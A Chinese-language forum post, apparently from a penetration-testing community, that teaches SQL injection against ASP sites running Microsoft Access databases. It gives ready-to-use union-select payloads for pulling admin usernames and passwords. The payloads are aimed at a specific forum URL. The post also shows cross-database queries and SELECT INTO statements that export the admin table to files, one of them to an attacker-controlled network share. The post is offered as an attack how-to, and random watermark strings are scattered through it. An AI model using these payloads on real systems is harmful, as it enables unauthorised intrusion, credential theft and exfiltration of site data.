中国网络渗透测试联盟
标题:
Access高级注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 14:20
标题:
Access高级注入语句
--------------------------------------------------------------
! G+ l l: G: d3 [+ |
union查询法
+ o- i, a( n# ~6 u8 Z- l+ ?
首先要说的就是查询办法,一般的查询办法就是
% b1 w. V- z7 T; j# q
+ R& n! u* I/ _& \
程序代码
7 D: @0 R$ t# W9 Q. q; t. q
and 1=(select count(*) from admin where left(id,1)='1')
8 @+ R; u) N. n- D0 I1 E! ?) S
& s T; B+ n5 L1 Z: d
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
: ]9 @$ h( r4 D. d [; `9 g5 D1 F
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
; m* q0 W: Z$ u- P* B( P* d# T
譬如你有一个ACCESS点:
) d; s0 o$ f( M6 r1 @# J, F
程序代码
0 [. Z0 p$ e9 t) u z
http://bbs.tian6.com/xiaoyang.asp?coder=1
* A7 c5 T3 {, ~' C3 [
1 R# D, s" D( e/ V' x) q
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
! N ?3 J7 o6 O! |+ V
然后我们直接来:
& Y% P7 _. i# E8 _) N
程序代码
- i( O* q( B* f( H, C9 c1 \0 A
http://bbs.tian6.com/xiaoyang.asp?coder=1
union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
- A# t: H9 J+ Q+ B X: z
8 ]5 d5 S- p& K3 D( s5 m- R, a% s# _
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
+ x8 W& E; L; X
9 q8 k+ ]$ H+ u; x1 R* y2 X8 X
' V) N' g/ g5 Y, {2 w
6 V8 U3 v' D/ k8 s% v' }, w; }
---------------------------------------------------------------
$ |+ d0 I* w1 G
Access跨库查询
% W0 U% h1 {6 ]
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
+ W( N( D2 p' I0 b/ x" g3 |
跨库的查询语句:
/ }( A/ |; ~4 q# {9 U
子查询:
. a3 b1 I6 G. Q% V( Y, ^& l
程序代码
0 [/ K/ ]6 T* w' J/ J6 q+ L
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
+ y5 ` p. j& S0 J& ]
- X$ ~# Q9 Y! E" {7 j! U& e
union查询:
8 J1 G7 I1 [+ T" x- _) J
程序代码
1 w% I5 }* k% f( S+ W! ~+ C0 D3 Q
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
9 \' ?7 m# a0 b# V6 }( {
" D0 S0 g$ P. D6 P8 t
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
& [5 F/ S, `8 q3 p9 T" O& e% N7 K6 y
程序代码
$ W* ^2 ]1 X6 }/ E3 c: h
http://www.4ngel.net/article/46.htm
* W5 o7 M. u+ V/ s1 e$ [
http://hf110.com/Article/hack/rqsl/200502/66.html
8 C. R" \6 ]2 Q
& C8 m" k( _1 E) e
---------------------------------------------------------------
$ ?* P/ h' F* J
Access注入,导出txt,htm,html
7 d0 v' e& m9 k; H. _9 q
子查询语句:
( S* [( _* @6 d/ V4 a% O
程序代码
4 E9 q0 X- ?5 T0 t
Select * into [test.txt] in 'd:\web\' 'text;' from admin
! T: m d) w6 B4 I% G; R* Z& z1 b
. i& [( K* U* f% c% w
这样就把admin表的内容以test类型存进了d:\web里面.
! S( h9 K0 o: \! W
UNION查询:
4 U" G! p6 |6 b. B
程序代码
; X4 T1 L1 f% T# v# i! ~
union select * into [admin.txt] in 'c:\' 'test;' from admin
* p: W2 S) [1 q
, C: u. |% W" J
而且这里也可以保存到本地来:
0 k% b) G. H6 u2 }
程序代码
2 y3 I& W; H% U, A7 o' c
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
; N* u- P- w; s
+ U! R" e& v7 ~! ?
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
* _8 ]9 F0 N- X/ t' u" q ^# P
/ E" v7 ^" g) t) S( V% M
程序代码
$ t0 U) c1 x6 ]+ O3 z- _% ~0 J$ s
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
- }3 h. u D6 o( B, I3 r4 O! X% h
2 ~4 ~6 n( N/ A% w+ y% W
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
$ _) A4 N9 J/ g4 p
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2